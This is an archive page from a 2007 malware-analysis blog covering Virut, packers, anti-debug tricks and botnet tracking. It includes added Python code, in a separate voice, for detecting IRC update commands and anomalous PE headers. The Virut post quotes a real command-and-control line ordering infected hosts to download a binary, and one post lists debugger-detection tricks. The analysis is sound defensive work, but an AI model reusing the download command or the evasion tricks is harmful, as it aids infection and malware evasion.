Archive for February, 2007

Signature detection and generation

Wednesday, February 28th, 2007

Usually when dealing with unknown malware it’s interesting to know whether any packers / protectors were used on it. For a seasoned malware analyst it’s easy to spot whether one is present or not, but even the best analyst can’t outright say which packer / protector it is on every sample. There are some publicly available signature scanners, with PEiD being the most widely known.


Avoiding debugger detection

Sunday, February 25th, 2007

It’s quite common to run into malicious programs (malware) that deploy various methods to detect debuggers. It’s good to be aware of what can be thrown in your face when you’re analyzing or unpacking malware. I’ll list a few here, and some ways to circumvent them.


Bottrackers

Thursday, February 22nd, 2007

I was recently creating a lightweight program to track botnet update commands. Currently it can connect to an IRC server, join a channel there and monitor the update commands. Every time it sees a certain update command it gives me a nice popup on the URL.

Originally, the program was 4096 bytes long, and I got interested in how small I could make it.

Currently the size is 2048 bytes, and if I have more time I’ll try to shave a few bytes off of it ;)

Quite small for an IRC bot, eh?

Update (24.2.2007, 00:10 GMT+2):

The size is now 1639 bytes :)

The saga of Virut continues

Tuesday, February 20th, 2007

I decided to poke around Virut a bit more. I followed the IRC trail, and spotted the following:

USER u394876 . . :_
NICK ssajvgia
JOIN &virtu
:ssajvgia!~u394876@xxx.xxx.xx.xxx JOIN :&virtu
:* PRIVMSG ssajvgia :!get http://www.ircer.pl:XX/XX.gif

So, what we have here is the C&C server at proxima.ircgalaxy.pl commanding the new infectees to download a binary from www.ircer.pl.
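The Bottrackers post above describes a small tracker that joins the channel and watches for update commands, and the trail quoted here shows what such a command looks like on the wire. As an added example (my code, not the author’s tracker), the Python below splits raw IRC lines into prefix, command, parameters and trailing text, then picks out PRIVMSG/NOTICE messages whose text is an update verb followed by an http(s) URL. The log is constructed from the quoted trail with the post’s XX redactions kept as-is, plus two made-up lines (a harmless chat line and a NOTICE variant); the "!get" verb set is taken from the trail, and treating NOTICE as a command channel is an assumption.

```python
import re
from urllib.parse import urlparse

# Constructed log: the IRC trail quoted in the post, plus a harmless chat line and
# a NOTICE variant, so the filter has something to ignore and a second hit.
# The "XX" parts are the post's own redactions and are kept as-is.
SAMPLE_LOG = """\
USER u394876 . . :_
NICK ssajvgia
JOIN &virtu
:ssajvgia!~u394876@xxx.xxx.xx.xxx JOIN :&virtu
:* PRIVMSG ssajvgia :!get http://www.ircer.pl:XX/XX.gif
:someone!~user@host PRIVMSG &virtu :hello there
:* NOTICE ssajvgia :!get http://update.invalid/XX.gif
"""

# RFC 1459 line shape: [":" prefix " "] command {" " middle} [" :" trailing]
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+) )?(?P<command>\S+)"
    r"(?P<middle>(?: [^:\s]\S*)*)"
    r"(?: :(?P<trailing>.*))?$"
)

# Update verbs to watch for; "!get" is the one seen in the Virut trail (assumed set).
UPDATE_VERBS = {"!get"}


def parse_irc_line(line):
    """Split one raw IRC line into prefix, command, middle params and trailing text."""
    m = IRC_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return {
        "prefix": m.group("prefix"),
        "command": m.group("command").upper(),
        "params": m.group("middle").split(),
        "trailing": m.group("trailing"),
    }


def extract_update_commands(log_text):
    """Return one record per PRIVMSG/NOTICE whose text is an update verb plus an http(s) URL."""
    hits = []
    for line in log_text.splitlines():
        msg = parse_irc_line(line)
        if not msg or msg["command"] not in ("PRIVMSG", "NOTICE") or not msg["trailing"]:
            continue
        words = msg["trailing"].split()
        if len(words) < 2 or words[0].lower() not in UPDATE_VERBS:
            continue
        url = urlparse(words[1])
        if url.scheme not in ("http", "https") or not url.hostname:
            continue  # not a fetchable URL, so not an update command we care about
        hits.append({
            "sender": msg["prefix"],
            "target": msg["params"][0] if msg["params"] else None,
            "verb": words[0].lower(),
            "url": words[1],
            "host": url.hostname,  # hostname only; the redacted port is left unparsed
        })
    return hits


if __name__ == "__main__":
    for hit in extract_update_commands(SAMPLE_LOG):
        print("%s -> %s: %s %s (host %s)" % (
            hit["sender"], hit["target"], hit["verb"], hit["url"], hit["host"]))
```

The parser keeps the middle parameters and the trailing text apart, so a URL inside the message body is never confused with the target nick or channel; a tracker built on this only has to feed it the lines it reads from the socket.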


Jumpin’ Jack

Sunday, February 18th, 2007

I ran into an unknown protector a few days ago. The main protection in it is boredom: it jumps around and around hundreds of times, executing junk code a few times in between. It does have some anti-debug and anti-analysis tricks, but the fact that I bypassed all the protections manually in under 15 mins tells a lot about the quality. I reckon it’s been done by some poor botherder somewhere who is now being ’sooooo l337′. The main tricks in the protector were:

  • A few xor decrypts
  • IsDebuggerPresent calls
  • CheckRemoteDebuggerPresent calls
  • FindWindow calls searching for OllyDbg
  • The old CreateFileA trick on \\.\NTICE
  • Several timing checks using rdtsc

OllyDbg first refused to debug the file, and when I took a look at the PE header it was quite obvious why :)
The number of directory entries was set to 2B4ADD80h, instead of the normal 10. After manually fixing the headers, the file was ready to receive some gentle love and care from OllyDbg.
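The header fix described above and the tricks listed before it lend themselves to a static pre-check before a sample ever reaches the debugger. Here is an added example (my code, not the author’s or any tool’s) in Python: it walks a PE header to the optional header, reads NumberOfRvaAndSizes, flags a count other than the normal 16 (10h, the value the post calls 10), resets it the way the post describes fixing the header by hand, and scans the bytes for the anti-debug indicators named in the list. The sample PE header is constructed inside the code and is not a real executable; the OLLYDBG window class name and the exact indicator string set are assumptions built from the post’s list.

```python
import struct

# Offsets of NumberOfRvaAndSizes inside IMAGE_OPTIONAL_HEADER, keyed by Magic.
OPT_MAGIC_PE32 = 0x10B
OPT_MAGIC_PE32PLUS = 0x20B
RVA_COUNT_OFFSET = {OPT_MAGIC_PE32: 92, OPT_MAGIC_PE32PLUS: 108}
IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16  # the normal value, 10h

# Indicators taken from the post's list of tricks (assumed string set):
# API names the protector calls, the SoftICE device name and OllyDbg's window class.
ANTI_DEBUG_INDICATORS = [
    b"IsDebuggerPresent",
    b"CheckRemoteDebuggerPresent",
    b"FindWindow",          # matches FindWindowA/FindWindowW import names
    b"\\\\.\\NTICE",        # the CreateFileA trick on \\.\NTICE
    b"OLLYDBG",             # window class name FindWindow would look for
]


def build_sample(directory_count=0x2B4ADD80):
    """Constructed PE32 header image (not a real executable) for testing.

    The optional header carries the given NumberOfRvaAndSizes, and the tail of
    the blob holds the indicator strings where a real sample would keep them
    in its import table or data section.
    """
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE signature right after the DOS header
    # IMAGE_FILE_HEADER: i386, 1 section, no symbols, 224-byte optional header, EXE flags
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, OPT_MAGIC_PE32)
    struct.pack_into("<I", opt, 16, 0x1000)      # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)    # ImageBase
    struct.pack_into("<I", opt, 92, directory_count)  # NumberOfRvaAndSizes
    return (bytes(dos) + b"PE\0\0" + file_header + bytes(opt)
            + b"\0".join(ANTI_DEBUG_INDICATORS) + b"\0")


def locate_optional_header(data):
    """Return (offset of the optional header, Magic), or raise ValueError."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt_off = e_lfanew + 4 + 20  # skip the signature and IMAGE_FILE_HEADER
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic not in RVA_COUNT_OFFSET:
        raise ValueError("unknown optional header magic 0x%X" % magic)
    return opt_off, magic


def inspect_pe(data):
    """Report the directory entry count and which anti-debug indicators appear in the bytes."""
    opt_off, magic = locate_optional_header(data)
    count = struct.unpack_from("<I", data, opt_off + RVA_COUNT_OFFSET[magic])[0]
    found = sorted(s.decode() for s in ANTI_DEBUG_INDICATORS if s in data)
    return {
        "number_of_rva_and_sizes": count,
        # Anything but 16 deserves a look; a debugger that trusts the value may refuse the file.
        "directory_count_anomalous": count != IMAGE_NUMBEROF_DIRECTORY_ENTRIES,
        "anti_debug_indicators": found,
    }


def fix_directory_count(data):
    """Return a copy with NumberOfRvaAndSizes reset to 16 (10h), the manual fix from the post."""
    opt_off, magic = locate_optional_header(data)
    fixed = bytearray(data)
    struct.pack_into("<I", fixed, opt_off + RVA_COUNT_OFFSET[magic],
                     IMAGE_NUMBEROF_DIRECTORY_ENTRIES)
    return bytes(fixed)


if __name__ == "__main__":
    sample = build_sample()
    report = inspect_pe(sample)
    print("NumberOfRvaAndSizes = 0x%X (anomalous: %s)"
          % (report["number_of_rva_and_sizes"], report["directory_count_anomalous"]))
    print("anti-debug indicators:", ", ".join(report["anti_debug_indicators"]))
    print("after fix: 0x%X" % inspect_pe(fix_directory_count(sample))["number_of_rva_and_sizes"])
```

Run it on a real file by replacing the constructed sample with the file’s bytes; the string scan is deliberately crude (import names and device paths may be built at run time), so a clean result means only that nothing obvious is visible statically.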

If you run into any interesting samples regarding packers or malware, you can send them in a password-protected zip to samples_at_teamfurry_dot_com.

——————————–

Update 11.3.2007:

The packer in question is something called AlexProtector :)

Who owns your homerouter?

Thursday, February 15th, 2007

A nice little paper describing how to ‘pwn’ home routers with default passwords through evil javascript :)

The paper is here, and the news article on it here.

Swedes to listen on the whole intarweb traffic?

Thursday, February 15th, 2007

The original article is in Swedish, sorry :) Basically, they are trying to push through a law that would allow the FRA (the local military intelligence) to listen in on all internet traffic crossing Swedish borders. It will be interesting to see how it falls through.

Under the Hood: Virut

Thursday, February 15th, 2007

Virut is a weird freak amongst malware. It’s a file infecting virus with IRC capabilities. It doesn’t use exploits to spread, but rather relies on filesharing by infecting various .exe and .scr files.

DNS root servers under attack

Tuesday, February 6th, 2007

A few of the DNS root servers have been under a DDoS attack since 6.2.2007 10:00 UTC.

g.root-servers.net and l.root-servers.net are taking the biggest hit, while a few other servers are either not targeted or have not seen much traffic.

The current status can be seen here or here.

PS. Today is the “Safer Internet Day” ;)

Unpacking PolyCryptPE

Tuesday, February 6th, 2007

As the name hints, PolyCryptPE is a polymorphic executable packer that was made by JLabSoftware, but has since been dropped from development. JLabSoftware got into some heated conversations because at least one anti-virus vendor, Kaspersky, flagged every file packed with PolyCryptPE. Anyway, PolyCryptPE deploys some nice stuff like file locking, API hooking and some inlined anti-debug and anti-dump tricks.

